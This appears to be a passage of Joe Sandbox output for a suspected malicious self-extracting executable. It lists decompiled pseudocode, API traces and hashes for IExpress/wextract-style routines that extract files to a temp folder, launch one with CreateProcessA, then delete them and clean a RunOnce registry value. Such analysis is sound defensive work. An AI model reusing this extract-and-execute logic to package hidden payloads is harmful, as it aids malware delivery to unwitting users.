0x00406b74
0x00406c39
0x00406c3e
0x00406c3e
0x00406abe
0x00406abe
0x00000000

APIs

Part of subcall function 00407155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
Part of subcall function 00407155: GetCurrentProcessId.KERNEL32 ref: 00407191
Part of subcall function 00407155: GetCurrentThreadId.KERNEL32 ref: 0040719A
Part of subcall function 00407155: GetTickCount.KERNEL32 ref: 004071A3
Part of subcall function 00407155: QueryPerformanceCounter.KERNEL32(?), ref: 004071B8

GetStartupInfoW.KERNEL32(?,004072B8,00000058), ref: 00406A7F
Sleep.KERNEL32(000003E8), ref: 00406AB4
_amsg_exit.MSVCRT ref: 00406AC9
_initterm.MSVCRT ref: 00406B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00406B49
exit.KERNELBASE ref: 00406BBF
_ismbblead.MSVCRT ref: 00406BDA

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
Instruction ID: 9f93abb3083409938a6c880a1f3258a823be3681a554c64202715cd4aa4e3ace
Opcode Fuzzy Hash: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
Instruction Fuzzy Hash: 2741C4719443258BEB21AB689A0476B77F4AB44720F25403FE883F73D1CF7C58618A9E

Uniqueness

Uniqueness Score: -1.00%

Function 004058C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004058C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00401680(_t20, _t36, _t33);
					E0040658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x409124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x409124 = E00406285();
					_t14 = 0;
				}
				return _t14;
			}

0x004058cd
0x004058d1
0x004058d3
0x004058d5
0x004058d8
0x004058d8
0x004058da
0x004058db
0x004058e1
0x004058ed
0x004058f1
0x0040591e
0x0040592c
0x00405943
0x0040594a
0x0040594d
0x00405953
0x00405959
0x00000000
0x0040595b
0x0040595c
0x00405963
0x0040596c
0x00000000
0x00405972
0x00405974
0x0040597a
0x0040597a
0x0040596c
0x004058f3
0x00405901
0x00405906
0x0040590b
0x00405910
0x00405910
0x00405918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004058E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405943
LocalFree.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040594D
CloseHandle.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405963

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004058CD, 004058CF, 00405919, 00405962
TMP4351$.TMP, xrefs: 00405923

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-2139698323
Opcode ID: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
Instruction ID: b28bd581754d51eb60e6e201e72a6d4170e8326a15d096e72f08d1eb5dd15189
Opcode Fuzzy Hash: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
Instruction Fuzzy Hash: FA1126B16002106BD7242F7A6C4DB9B7E9DDF85364B10463AB90AF32D1CA788C2586AC

Uniqueness

Uniqueness Score: -1.00%

Function 00403FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x408004; // 0xee8c6708
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00406CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E004044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x408a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x409a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x409a2c = _t44;
						}
					}
				}
				E0040411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x409a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00403fef
0x00403ffa
0x00404001
0x00404008
0x0040400a
0x0040400b
0x00404010
0x0040410a
0x0040411a
0x0040411a
0x0040401c
0x0040401d
0x0040401e
0x0040401f
0x00404033
0x0040403b
0x004040ca
0x004040e9
0x004040f8
0x00404101
0x00404106
0x00404106
0x00404108
0x00404108
0x00000000
0x00404108
0x00404049
0x0040405c
0x00404062
0x00404068
0x0040406e
0x00404070
0x00404077
0x0040407f
0x00404089
0x0040408b
0x0040408b
0x00404089
0x00404077
0x00404091
0x0040409c
0x004040a8
0x004040b8
0x00000000
0x004040c2
0x00000000
0x004040c2

APIs

CreateProcessA.KERNELBASE ref: 00404033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404049
GetExitCodeProcess.KERNELBASE ref: 0040405C
CloseHandle.KERNEL32(?), ref: 0040409C
CloseHandle.KERNEL32(?), ref: 004040A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004040DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 004040E9

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
Instruction ID: f55851d03d85abb9b2f3690b68a1bd7c8abf884a38cd72d7ac8736cd390e9c04
Opcode Fuzzy Hash: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
Instruction Fuzzy Hash: 3431ADB1640218ABEB209F65DD4CFAB7778EBD4714F1041BAFA45F62A1CA344C81CE29

Uniqueness

Uniqueness Score: -1.00%

Function 004051E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0040468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0040468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E004044B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x409124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x409124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x409124 = 0x80070714;
					goto L10;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L10;
			}

0x004051fb
0x00405207
0x0040520b
0x0040523c
0x00405268
0x00405270
0x0040528b
0x00405293
0x0040529c
0x004052a6
0x004052b0
0x00000000
0x004052b0
0x0040529e
0x00405279
0x00000000
0x0040527b
0x00405273
0x00000000
0x00405273
0x0040524a
0x00405250
0x00405256
0x00000000
0x00405256
0x00405219
0x00405223
0x00000000

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405250

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

Strings

<None>, xrefs: 00405262
UPROMPT, xrefs: 004051EF, 00405230

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
Instruction ID: 09f94c95ee8dde742b6e9a7adb48e62a9eab8c8aba96d5021a361f4290a7392f
Opcode Fuzzy Hash: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
Instruction Fuzzy Hash: 2211E2B5300205ABE3286B725E49F3B619DDFC8394B10447FBB02F62E0DABD8C11492D

Uniqueness

Uniqueness Score: -1.00%

Function 004052B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x408004; // 0xee8c6708
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x4091e0; // 0x4eed580
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x408a24 == 0 &&  *0x409a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t2 =  &(_t31[1]); // 0x4eed560
						_t31 =  *_t2;
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x408a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x408a24 == 0 &&  *0x409a30 == 0) {
					_push(_t22);
					E00401781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x409a34 & 0x00000020) != 0) {
						E004065E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00402390( &_v268);
					_t11 =  *0x408a20; // 0x0
				}
				if( *0x409a40 != 1 && _t11 != 0) {
					_t11 = E00401FE1(_t22); // executed
				}
				 *0x408a20 =  *0x408a20 & 0x00000000;
				return E00406CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x004052b6
0x004052b6
0x004052b6
0x004052c1
0x004052c8
0x004052cb
0x004052cc
0x004052d4
0x004052d6
0x004052d7
0x004052de
0x004052e0
0x004052f2
0x004052fa
0x004052fa
0x00405302
0x00405302
0x00405305
0x0040530c
0x00405312
0x00405316
0x00405316
0x00405317
0x0040531c
0x0040531f
0x00405333
0x00405345
0x00405351
0x00405359
0x00405359
0x00405363
0x00405369
0x0040536f
0x00405374
0x00405374
0x00405381
0x00405387
0x00405387
0x0040538f
0x004053a0

APIs

SetFileAttributesA.KERNELBASE(04EED580,00000080,?,00000000), ref: 004052F2
DeleteFileA.KERNELBASE(04EED580), ref: 004052FA
LocalFree.KERNEL32(04EED580,?,00000000), ref: 00405305
LocalFree.KERNEL32(04EED580), ref: 0040530C
SetCurrentDirectoryA.KERNELBASE(004011FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00405334

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-2312194364
Opcode ID: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
Instruction ID: a399f6850f9857e4a2a636118a1f1a303e38fc590d24b9381051fc2fad193b26
Opcode Fuzzy Hash: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
Instruction Fuzzy Hash: 43217C31600618DBDB24AB24EE09B6A77A4EB14754F04017EE882766E1CBB85D94CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x408530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00401fee
0x00402005
0x0040200d
0x00402017
0x00000000
0x00402020
0x0040200d
0x00402029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0040538C,?,?,0040538C), ref: 00402005
RegDeleteValueA.KERNELBASE(0040538C,wextract_cleanup0,?,?,0040538C), ref: 00402017
RegCloseKey.ADVAPI32(0040538C,?,?,0040538C), ref: 00402020

Strings

wextract_cleanup0, xrefs: 00401FE7, 0040200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00401FFB

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
Instruction ID: 964837390bdcfb9f7028471f109179f02a98b209a827bd19e41bd068bc92d2f3
Opcode Fuzzy Hash: 4a4bbfe9345666091a03c04c6406ee07b10a2f14f218e9796807bdc021751f89
Instruction Fuzzy Hash: F4E04F31950318BBD7218F90EF0EF5A7B2DE700744F2001BABA04B01E0EBB65A24D60D

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x408004; // 0xee8c6708
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x4091d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00404E99(_t75);
						L35:
						return E00406CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x408584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x4091e4;
						_t58 = 0x4091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x4091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0040476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00404980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E004047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x4093f4 =  *0x4093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x4091e4;
						_t63 = 0x4091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x4091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x4091e4;
						_t30 = E00404702( &_v268, 0x4091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00404C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00404B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00404B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00404cd0
0x00404cdb
0x00404ce0
0x00404ce2
0x00404cee
0x00404cf2
0x00404d0e
0x00404d0e
0x00404d11
0x00404e83
0x00404e88
0x00404e98
0x00404e98
0x00404d17
0x00404d17
0x00404d1a
0x00404d2f
0x00404d2f
0x00000000
0x00404d2f
0x00404d1c
0x00404d1c
0x00404d1f
0x00404dcb
0x00404dd0
0x00404dd2
0x00404ddd
0x00404ddd
0x00404de3
0x00404de8
0x00404ded
0x00404ded
0x00404def
0x00404df0
0x00404df0
0x00404df4
0x00404df4
0x00404df6
0x00404df9
0x00404dfc
0x00404dfc
0x00404dfe
0x00404dff
0x00404dff
0x00404e03
0x00404e08
0x00404e0a
0x00404e0f
0x00404d03
0x00404d03
0x00000000
0x00404d03
0x00404e18
0x00404e20
0x00404e25
0x00404e27
0x00000000
0x00000000
0x00404e33
0x00404e38
0x00404e3a
0x00000000
0x00000000
0x00404e40
0x00404e51
0x00404e56
0x00404e5b
0x00404e5e
0x00000000
0x00000000
0x00404e6a
0x00404e6f
0x00404e71
0x00000000
0x00000000
0x00404e77
0x00404e7d
0x00000000
0x00404e7d
0x00404d25
0x00404d25
0x00404d28
0x00404d36
0x00404d3b
0x00404d40
0x00404d40
0x00404d42
0x00404d43
0x00404d43
0x00404d47
0x00404d4a
0x00404d4a
0x00404d4c
0x00404d4f
0x00404d4f
0x00404d51
0x00404d52
0x00404d52
0x00404d56
0x00404d5b
0x00404d5d
0x00404d62
0x00000000
0x00000000
0x00404d67
0x00404d6f
0x00404d74
0x00404d76
0x00000000
0x00000000
0x00404d7c
0x00404d84
0x00404d89
0x00404d8b
0x00000000
0x00000000
0x00404d94
0x00404d99
0x00404d9e
0x00404da1
0x00404daa
0x00404daa
0x00404da3
0x00404da3
0x00404da3
0x00404db5
0x00404dbb
0x00404dbd
0x00000000
0x00404dc3
0x00404dc5
0x00000000
0x00404dc5
0x00404dbd
0x00404d2a
0x00404d2a
0x00404d2d
0x00000000
0x00000000
0x00000000
0x00404d2d
0x00404cf8
0x00404cfd
0x00404d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00404DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00404DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00404D36, 00404DE3

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-2312194364
Opcode ID: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
Instruction ID: 31e8ee9ec96c77640c407dc2e3c45d8f9ad1bcb24b75663886ce4ee65fd8817f
Opcode Fuzzy Hash: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
Instruction Fuzzy Hash: 244123B62001019BCB219F38ED446B673A5AFC5304B04467FDE86B72D1DA39DE4AC798

Uniqueness

Uniqueness Score: -1.00%

Function 00404C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x408d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x408d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00404c40
0x00404c4a
0x00404c8d
0x00000000
0x00404c70
0x00404c70
0x00404c7e
0x00404c86
0x00000000
0x00000000
0x00000000
0x00404c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00404C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00404C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00404C7E

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
Instruction ID: 26a6f2e907af393bf0761dda356fb09445650c1bae6419f8d7bc6e601a313ac9
Opcode Fuzzy Hash: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
Instruction Fuzzy Hash: BEF090B260520CAFFB24DFB4CD48DBB77ACEB44250B44453FAA16E11D0EA34D924C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

